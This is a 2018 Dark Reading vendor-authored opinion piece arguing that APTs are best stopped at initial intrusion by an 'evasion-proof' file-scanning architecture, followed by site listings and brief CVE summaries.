Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Security Management

7/6/2018
09:35 AM
Boris Vaynberg
Boris Vaynberg
News Analysis-Security Now
50%
50%

APTs: Now's the Time for a New Approach

Advanced Persistent Threats, or APTs, are one of the greatest problems that enterprises face today. However, security teams have been taking the wrong approach...

By every approximation, Advanced Persistent Threats (APTs) are rising at an exponential rate. A massive industry of cybersecurity products, which go far beyond early-generation anti-virus and firewall solutions, has sprung up to combat and address these new threats at the various stages of the exploitation lifecycle.

Although APTs may vary significantly from each other, there's one clear common denominator that is at the heart of every successful attack.

Traditional defenses, even the most advanced ones such as sandboxing, have all been based on the assumption that using advanced techniques will be able to detect "malicious intent" and separate it from "good content." This game of cat and mouse is what the industry is experiencing these days and one that is won by the attackers as they continue to evolve their techniques to work around "heuristics" detection.

These types of technologies, however, have a high rate of misdetection and false alarms.

But what happens if there is a "weakest link" -- common for all or most cyber attacks -- that could invert the situation, giving the defender the upper hand?

Finding common ground in APT
In order to establish a beachhead, attackers need to get a "piece" of executable code, and active content to a machine in the target network. They will use any number of methods to get a user to access malicious content, such as spear phishing. To avoid detection, the executable code -- shellcode -- is hidden in data objects, such as Office documents, and executed by exploiting vulnerabilities in common applications -- Adobe PDF Reader, for example.

The impact can be staggering, with cybercrime damages expected to hit $6 trillion annually by 2021, according to a report, Cybersecurity Venture.

Prevent rather than remediate
APTs continue to use a familiar route to achieve exploitation. According to Mandiant's M-Trends, details of the exploitation lifecycle can be summed up as follows:

  • Step 1: Reconnaissance
  • Step 2: Initial Intrusion into Network
  • Step 3 Establish Network Backdoor
  • Step 4: Obtain User Credentials
  • Step 5: Install Various Utilities
  • Step 6: Privilege Escalation/Lateral Movement/Data Exfiltration
  • Step 7: Maintain Persistence

However, it's Step 2 -- the initial intrusion -- that remains the critical step for APT operators.

Gaining a beachhead in the target environment is the primary goal of the initial intrusion. Once a network is exploited, the attacker usually places malware on the compromised system and uses it as a starting point or proxy for further actions. Malware placed during the initial intrusion phase is commonly a simple downloader -- a basic Remote Access Trojan or a simple shell.

The problem is that few cybersecurity tools can detect shellcode that uses dynamic packers for which no known signatures and patterns are available.

It's clear that preventing an intrusion early -- before the need for costly remediation -- is the best, and cheapest, practice for fighting APTs. In 60% of cases, attackers are able to compromise an organization within minutes, but it takes most businesses nearly 200 days to detect a breach on their network, which means remediation costs skyrocket.

Detecting the evasive
Attackers still possess the edge, particularly in zero-day exploits, despite considerable security investment. Traditional cybersecurity software applications often become counter-productive by identifying malicious threats and analyzing the questionable behavior within the threat's target environment.

To keep ahead of prevention itself, you need an elegant security protection architecture that is evasion-proof.

By systematically scanning for hidden code instructions instead -- or any other commands that might indicate malicious intent -- an evasion-proof architecture will not open or execute incoming files. By looking at the code verses the exploit within, no doomsday device will be set off and the platform can catch any suspicious code, place it in quarantine and review at a later time.

Ultimately, no malicious code can "evade" detection because it never gets a chance to execute itself.


Boost your understanding of new cybersecurity approaches at Light Reading's Automating Seamless Security event on October 17 in Chicago! Service providers and enterprise receive FREE passes. All others can save 20% off passes using the code LR20 today!

Similarly, such a platform would analyze and interpret script by using a proprietary limited interpreter, that evaluates every single statement line by line. Every possible flow of execution, including conditional branches are being exposed and normalized.

When it comes to malicious URLs, the platform could accurately detect and differentiate between hyperlinks and automatically invoked remote objects, yielding information on the purpose of every remote object, and its behavior. It would determine the type of embedding used, even without the need to fetch the actual remote file or object, figure out its level of maliciousness in real time, and block even the most evasive malware.

Why worry about scores based on heuristics or behaviors or false-positive or false-negatives when you can get a deterministic outcome with detailed meta data for deep forensic analysis?

By not relying on underlying technology stack variations or requiring a carefully curated environment for runtime analysis, an evasion-proof architecture is incredibly effective in stopping today's attacker whether known or unknown, and is, as such, future ready as well.

Boris Vaynberg is CEO and a co-founder of Solebit. His previous experience includes positions at Elbit Systems' Intelligence and Cyber Solutions division and Comsec Consulting's Information Security division. He also served for six years in an elite technology unit of the Israel Defense Forces (IDF). .

Comment  | 
Print  | 
More Insights
Comments
Oldest First  |  Newest First  |  Threaded View
7 Tips for Choosing Security Metrics That Matter
Ericka Chickowski, Contributing Writer,  10/19/2020
IoT Vulnerability Disclosure Platform Launched
Dark Reading Staff 10/19/2020
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
Special Report: Computing's New Normal
This special report examines how IT security organizations have adapted to the "new normal" of computing and what the long-term effects will be. Read it and get a unique set of perspectives on issues ranging from new threats & vulnerabilities as a result of remote working to how enterprise security strategy will be affected long term.
Flash Poll
How IT Security Organizations are Attacking the Cybersecurity Problem
How IT Security Organizations are Attacking the Cybersecurity Problem
The COVID-19 pandemic turned the world -- and enterprise computing -- on end. Here's a look at how cybersecurity teams are retrenching their defense strategies, rebuilding their teams, and selecting new technologies to stop the oncoming rise of online attacks.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2020-9994
PUBLISHED: 2020-10-22
A path handling issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to overwrite arbitrary files.
CVE-2020-9997
PUBLISHED: 2020-10-22
An information disclosure issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6, watchOS 6.2.8. A malicious application may disclose restricted memory.
CVE-2020-9927
PUBLISHED: 2020-10-22
A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges.
CVE-2020-9928
PUBLISHED: 2020-10-22
Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges.
CVE-2020-9929
PUBLISHED: 2020-10-22
A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to cause unexpected system termination or read kernel memory.